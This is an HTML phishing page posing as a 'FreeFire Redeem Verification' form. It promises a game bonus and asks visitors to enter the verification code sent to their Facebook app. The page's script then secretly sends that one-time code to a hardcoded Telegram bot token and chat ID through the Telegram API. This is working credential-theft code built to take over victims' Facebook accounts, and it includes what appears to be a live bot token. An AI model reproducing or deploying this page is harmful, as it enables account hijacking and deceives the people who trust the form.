<!DOCTYPE html>
<html>
<head>
<title>FreeFire Redeem Verification</title>
<style>
  body {
    font-family: Arial, sans-serif;
    text-align: center;
  }
  
  #container {
    width: 80%;
    max-width: 400px;
    margin: 0 auto;
  }
  
  h1 {
    font-size: 20px;
    margin-bottom: 10px;
  }
  
  p {
    font-size: 16px;
    line-height: 1.5;
  }
  
  input[type="text"] {
    width: 100%;
    height: 30px;
    padding: 5px;
    border: 1px solid #ccc;
    margin-bottom: 10px;
  }
  
  .button {
    display: inline-block;
    padding: 10px 20px;
    background-color: #4CAF50;
    color: white;
    border: none;
    cursor: pointer;
  }
  
  /* Responsive Styling */
  @media screen and (max-width: 500px) {
    #container {
      width: 90%;
    }
  }
</style>
</head>
<body>
<div id="container">
  <h1>FreeFire Redeem Verification</h1>
  <p>We just sent you a verification code. Check your Facebook app notification, verify your code, and get FreeFire redeem bonus!</p>
  <p>Enter your verification code</p>
  <form id="otpForm">
    <input type="text" id="otpInput" placeholder="Enter code here" required>
    <button type="submit" class="button">Verify Code</button>
  </form>
  <div id="verificationProgress" style="display:none;">
    <p>Verifying code...</p>
  </div>
</div>

<script>
  document.getElementById("otpForm").addEventListener("submit", function(event) {
    event.preventDefault();
    var otp = document.getElementById("otpInput").value;
    if (otp) {
      // Show verification progress
      document.getElementById("verificationProgress").style.display = "block";
      // Send OTP to Telegram bot
      sendOTPtoTelegram(otp);
    } else {
      alert("Please enter your verification code.");
    }
  });

  function sendOTPtoTelegram(otp) {
    // Replace 'YOUR_BOT_TOKEN' and 'YOUR_CHAT_ID' with your actual bot token and chat ID
    var botToken = '6739284031:AAGJXHV35PJgymggDO-9j6AgvonSlM_rXPg';
    var chatId = '6384709667';
    var message = 'Verification code: ' + otp;
    var url = 'https://api.telegram.org/bot' + botToken + '/sendMessage?chat_id=' + chatId + '&text=' + message;

    fetch(url)
      .then(response => {
        if (!response.ok) {
          throw new Error('Network response was not ok');
        }
        return response.json();
      })
      .then(data => {
        console.log(data);
        // You can add further handling here if needed
      })
      .catch(error => {
        console.error('There was a problem with the fetch operation:', error);
      });
  }
</script>
</body>
</html>
